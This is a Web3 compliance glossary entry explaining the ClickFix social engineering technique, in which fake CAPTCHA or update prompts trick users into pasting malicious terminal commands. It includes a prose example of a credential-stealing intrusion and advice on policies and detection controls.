ClickFix

ClickFix is a social engineering technique that saw mass adoption by threat groups including BlueNoroff, Akira, and REDBIKE in late 2025 and 2026. Rather than delivering malware through email attachments — a vector that modern endpoint detection readily flags — ClickFix attackers compromise legitimate websites or send carefully crafted phishing links that present the target with a convincing fake error message: a simulated CAPTCHA failure, a browser-update prompt, or a document rendering error. The prompt instructs the user to open their terminal or run dialog and paste a specific command to 'fix' the issue. The pasted command executes a malicious script that installs malware, often a remote-access trojan or credential-harvesting implant. Because the user is the one executing the command in a legitimate system context, traditional endpoint security tools do not generate an alert — the execution chain looks identical to an administrator running a routine shell command. ClickFix effectively inverts the traditional social engineering model: rather than tricking the victim into opening a file, it tricks them into becoming the malware delivery mechanism themselves. Example: A developer at a Web3 firm visited a compromised DeFi documentation site and encountered a fake 'CAPTCHA verification required' prompt. Copying and running the provided terminal command installed a Remote Access Tool that harvested the developer's SSH keys and cloud credentials overnight — providing BlueNoroff operators lateral access to the firm's CI/CD pipeline by morning. Why it matters for compliance: ClickFix exploits users' willingness to follow simple technical instructions rather than any weakness in software. It bypasses endpoint detection, email filters, and sandbox analysis simultaneously. Crypto and Web3 firms must implement explicit policies prohibiting execution of terminal commands received from any external source, combined with technical controls that alert on unexpected shell-history activity from non-engineering workstations.

Category: compliance, wallets security

Explore the full Web3 Glossary — 2,062+ expert-curated definitions. Need guidance? Talk to our consultants.